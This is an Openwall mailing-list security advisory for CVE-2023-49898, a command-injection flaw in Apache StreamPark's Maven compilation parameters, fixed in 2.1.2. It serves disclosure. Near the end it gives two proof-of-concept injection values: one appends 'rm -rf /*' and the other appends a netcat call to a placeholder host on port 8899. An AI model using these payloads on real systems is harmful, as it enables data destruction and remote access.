Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 15 Dec 2023 11:00:59 +0000
From: Huajie Wang <>
Subject: CVE-2023-49898: Apache StreamPark (incubating): Authenticated
 system users could trigger remote command execution 

Severity: low

Affected versions:

- Apache StreamPark (incubating) 2.0.0 before 2.1.2


In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.


all users should upgrade to 2.1.2


##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.